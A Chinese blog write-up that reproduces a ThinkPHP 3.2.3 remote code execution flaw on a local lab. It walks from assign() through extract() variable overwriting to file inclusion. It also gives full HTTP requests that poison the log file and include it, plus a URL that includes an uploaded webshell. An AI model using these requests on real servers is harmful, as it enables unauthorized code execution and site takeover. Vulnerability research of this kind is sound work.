ThinkPHP 3.2.x RCE漏洞复现
打湖湘杯遇到一个类似的willphp题目,都审到cfile了没做出来。。。于是把这个翻出来搞了一波,过程参考了网上别的师傅的0.0
什么是ThinkPHP
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。
作为一个整体开发解决方案,ThinkPHP能够解决应用开发中的大多数需要,因为其自身包含了底层架构、兼容处理、基类库、数据库访问层、模板引擎、缓存机制、插件机制、角色认证、表单处理等常用的组件,并且对于跨版本、跨平台和跨数据库移植都比较方便。并且每个组件都是精心设计和完善的,应用开发过程仅仅需要关注您的业务逻辑。
环境
ThinkPHP3.2.3完整版
搭建成功
漏洞原理
在ThinkPHP3.2.3框架的程序中,如果要在模板中输出变量,需要在控制器中把变量传递给模板,系统提供了assign方法对模板变量赋值,本漏洞的利用条件为assign方法的第一个变量可控
本地代码审计
先跟进Application/Home/Controller/IndexController.class.php,assign方法中第一个变量为可控变量
全局搜索assign,在ThinkPHP/Library/Think/View.class.php中发现了如下内容,可控变量被赋值给了$this→tVar
赋值结束后进入display方法中,display方法解析并获取模板文件内容,此时还为空
在这里解释一下模板文件,ThinkPHP内置了一个基于XML的性能卓越的模板引擎 ThinkTemplate,这是一个专门为ThinkPHP服务的内置模板引擎。ThinkTemplate是一个使用了XML标签库技术的编译型模板引擎,支持两种类型的模板标签,使用了动态编译和缓存技术,而且支持自定义标签库。
举个栗子,在模板中输出变量的方法,例如,在控制器中我们给模板变量赋值:
$name = 'ThinkPHP';
$this->assign('name',$name);
$this->display();
然后就可以在模板中使用:
Hello,{$name}!
模板编译后的结果就是:
Hello,<?php echo($name);?>!
这样,运行的时候就会在模板中显示: Hello,ThinkPHP!
也就是说,assign(name,value)函数的两个变量,会把value赋值给模板中名称为name的变量
我们继续
进入fetch方法,传入的参数为空时会根据配置获取默认的模板文件位置 (./Application/Home/View/Index/index.html),之后系统配置的默认模板引擎为think,所以会进入else分支,获取 t h i s → t V a r 变 量 值 赋 值 给 this→tVar变量值赋值给 this→tVar变量值赋值给params,之后进入Hook::listen方法
全局搜索listen,在ThinkPHP/Library/Think/Hook.class.php中找到了方法定义,进入exec方法
进入exec方法中,处理后调用Behavior\ParseTemplateBehavior类中的run方法处理$params这个带有日志文件路径的值
全局搜索run方法,跟进ThinkPHP/Library/Behavior/ParseTemplateBehavior.class.php,进入else分支调用Think\Template类中的fetch方法对变量$_data(为带有日志文件路径的变量值)进行处理。
跟进ThinkPHP/Library/Think/Template.class.php,获取缓存文件路径后进入Storage的load方法中
跟进到ThinkPHP/Library/Think/Storage/Driver/File.class.php的load方法中, f i l e n a m e 为 之 前 获 取 的 缓 存 文 件 路 径 , _filename为之前获取的缓存文件路径, filename为之前获取的缓存文件路径,vars则为之前带有_filename=日志文件路径的数组,$vars不为空则使用extract方法的EXTR_OVERWRITE默认描述对变量值进行覆盖,之后include该日志文件路径,导致文件包含,触发ThinkPHP 3.x Log RCE漏洞
漏洞利用
首先访问
请求数据包
payload
/tp3/index.php?m=Home&c=Index&a=index&test=-->
数据包
GET /tp3/index.php?m=Home&c=Index&a=index&test=--> HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=001umblca9soshaqg0j13kmjs5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
bp抓包防止一些字符被浏览器编码
查看日志文件发现成功写入
接下来构造攻击请求
GET /tp3/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/21_11_21.log HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=001umblca9soshaqg0j13kmjs5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
芜湖~~
拿下
这次我们试下一句话木马
上传具有恶意代码的任何文件到服务器上,直接包含其文件相对或绝对路径即可
payload
http://localhost/tp3/index.php?m=Home&c=Index&a=index&value[_filename]=./attack.php
拿来吧你!
